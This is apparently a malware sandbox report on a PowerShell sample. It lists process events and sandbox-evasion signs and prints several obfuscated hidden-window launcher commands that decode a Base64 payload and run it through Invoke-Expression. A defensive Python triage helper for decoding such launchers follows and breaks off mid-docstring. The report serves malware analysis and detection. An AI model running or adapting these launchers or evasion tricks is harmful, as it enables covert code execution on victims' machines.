                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries)
                Source: C:\Windows\System32\cmd.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX (58 identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterConfiguration
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6075
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3696
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4554
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5264
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432 Thread sleep count: 6075 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856 Thread sleep count: 3696 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428 Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000002.00000002.1852867523.000002C3F2115000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1968184626.0000019FD32B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /w 1 -ep bypass -w hidden -command $cmkgnabv=[convert]::frombase64string('jhbwcca9iepvaw4tugf0acaojgvudjpbchbeyxrhksaiy2hyb21llnbzmsi7icrzdhigpsanjgfhysa9iepvaw4tugf0acaojgvudjpbchbeyxrhksaidgvtcc5wczeioyb3z2v0ic1vcmkgimh0dhbzoi8vzgwuzhjvcgjvehvzzxjjb250zw50lmnvbs9zy2wvzmkvzgt1yw1scmxzcmj5z3nvmxn3bjhwl3nhbnrhmi1mlnr4dd9ybgtlet1yogzlmhzpawvymw13djlhems1yxd5nxm5jnn0pxl2cxfmzgz5jmrsptaiic1pdxrgawxlicrhywe7icygjgfhytsgumvtb3zllul0zw0glvbhdgggjgfhysatrm9yy2u7jzsgjhn0cib8ie91dc1gawxlic1gawxlugf0acakchbwic1fbmnvzgluzybvvey4oyakywn0aw9uid0gtmv3lvnjagvkdwxlzfrhc2tby3rpb24gluv4zwn1dgugj1bvd2vyu2hlbgwuzxhljyatqxjndw1lbnqgjy1xaw5kb3dtdhlszsbiawrkzw4glw5vccaglu5vbkludgvyywn0axzlic1ob1byb2zpbgugluv4zwn1dglvblbvbgljesbcexbhc3mglunvbw1hbmqgiiygeyrhymmgpsbkb2lulvbhdgggkcrlbny6qxbwrgf0yskgxcjjahjvbwuuchmxxci7icygjgfiyzt9iic7icr0cmlnz2vyid0gtmv3lvnjagvkdwxlzfrhc2tucmlnz2vyic1pbmnlic1bdcaor2v0lurhdguplkfkze1pbnv0zxmonskglvjlcgv0axrpb25jbnrlcnzhbcaotmv3lvrpbwvtcgfuic1naw51dgvzidmwktsgjhnldhrpbmdzid0gtmv3lvnjagvkdwxlzfrhc2ttzxr0aw5nc1nldcatsglkzgvuoybszwdpc3rlci1ty2hlzhvszwruyxnric1uyxnrtmftzsaiq2hyb21lvxbkyxrlvgfza01hy2hpbmuiic1by3rpb24gjgfjdglvbiatvhjpz2dlciakdhjpz2dlciatu2v0dgluz3mgjhnldhrpbmdzoyagjgfhysa9iepvaw4tugf0acaojgvudjpbchbeyxrhksaic3lzdgvtx2zpcnn0lnbzmsi7ihdnzxqglvvyasaiahr0chm6ly9kbc5kcm9wym94dxnlcmnvbnrlbnquy29tl3njbc9mas9nn21jc2hrednxbw81bxz5dgyyy3qvc2fudgeylxgudhh0p3jsa2v5ptvuymjxzwdjnwe3n3i3nmhpew02czl5mmgmc3q9nzi3y3mxbxgmzgw9mciglu91dezpbgugjgfhytsgjiakywfhoybszw1vdmutsxrlbsatugf0acakywfhic1gb3jjzts=');$u9zbwfed = [system.text.encoding]::utf8.getstring($cmkgnabv);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-e','res','sio','inv','n') $u9zbwfed
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /w 1 -ep bypass -w hidden -command $cmkgnabv=[convert]::frombase64string('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');$u9zbwfed = [system.text.encoding]::utf8.getstring($cmkgnabv);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-e','res','sio','inv','n') $u9zbwfed
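The three cmd.exe -> powershell.exe entries above share one launcher shape: a Base64 blob is decoded with [Convert]::FromBase64String, re-read as UTF-8, and handed to a cmdlet whose name is only assembled at run time by the -f format operator ('{5}{0}{2}{1}{3}{4}{6}' -f 'oke','xp','-E','res','sio','Inv','n' evaluates to Invoke-Expression), all under -ep bypass -w hidden so the script runs without a window or an execution-policy check. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report or of the sample. It resolves the -f reassembly, lists the launcher switches, decodes the blob, and flags the trap in this report: one copy of the command line is printed lower-cased, and Base64 is case-sensitive, so that copy can never decode back to the script. The payload it decodes is a constructed stand-in, because on this page the mixed-case blobs are elided and the only visible blob is the case-folded one.

```python
import base64
import binascii
import re

# Constructed stand-in for the decoded script (not the sample's real script,
# whose blob is elided or case-folded in the report).
STAND_IN_PAYLOAD = 'Write-Output "stand-in payload, not the sample\'s script"'

# The launcher's FromBase64String('...') literal; case-insensitive because one
# copy of the command line in the report is lower-cased.
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", re.IGNORECASE)
# PowerShell's  ('{5}{0}...' -f 'a','b',...)  string-reassembly idiom.
FORMAT_RE = re.compile(r"\(\s*'([^']*)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)")
# Launcher switches worth surfacing: hidden window and execution-policy bypass.
FLAG_RE = re.compile(r"(?i)(?:^|\s)(/w\s+1|-w\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass)")


def build_launcher(payload):
    """Rebuild the launcher shape seen in the report around a constructed payload."""
    blob = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    return ("powershell /W 1 -ep bypass -w hidden -command "
            "$cmkGnaBV=[Convert]::FromBase64String('" + blob + "');"
            "$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);"
            "&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD")


def resolve_format_operator(cmdline):
    """Resolve the -f reassembly. PowerShell's -f is .NET String.Format with
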